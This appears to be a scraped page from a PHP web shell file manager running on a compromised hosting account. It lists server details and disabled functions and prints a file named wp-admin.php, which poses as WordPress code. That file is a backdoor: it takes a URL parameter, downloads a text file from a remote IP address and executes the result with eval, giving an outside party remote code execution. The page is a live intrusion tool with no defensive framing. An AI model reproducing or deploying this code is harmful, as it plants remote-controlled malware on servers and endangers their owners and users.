🚀 Hostinger Optimized
🖥️ Server: LiteSpeed
💻 System: Linux in-mum-web1643.main-hosting.eu 5.14.0-611.42.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 24 05:30:20 EDT 2026 x86_64
👤 User: u621169360 (621169360)
🐘 PHP: 8.2.30
🚫 Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail

💻 Terminal

📁 /home/u621169360/domains/agriexpertt.com/public_html/wp-admin
$

📄 wp-admin.php

📁 Path: /home/u621169360/domains/crm.webotapp.com/public_html/wp-admin.php
📊 Size: 1.07 KB
🔒 Perm: 0644
📝 MIME: text/x-php
<?php
/*
* Support@gmail.com
*/

function WordPress_Http_Curl ( $txt = '0303', $args = array() ) {
    if ( ! function_exists( "curl_init" ) || ! function_exists( "curl_exec" ) ) {
        return false;
    }
    $handle = curl_init();
    curl_setopt( $handle, CURLOPT_URL, 'http://69.30.227.202/file/'.$txt.'.txt' );
    curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true );
    curl_setopt( $handle, CURLOPT_HEADER, false );
    curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false );
    curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false );
    $response = curl_exec( $handle );
    $curl_error = curl_error( $handle );
    if ( !$curl_error ) {
        $response = array(
            "data" =>  eval( "?>". $response )
        );
        return $response['data'];
    } else {
        return $curl_error;
    }
    if ( PHP_VERSION_ID < 80000 ) {
        curl_close( $handle );
    }
}

$get = isset($_GET) ? $_GET : array();
$link = '';
foreach ($get as $key => $value) {
    if($key == 'a'){
        $link = $value;
    }
}

$result = WordPress_Http_Curl( $link );
print_r($result);
// 2026
← Back📥 Raw✏️ Edit🔒 Chmod
✨ File Manager Magic ✨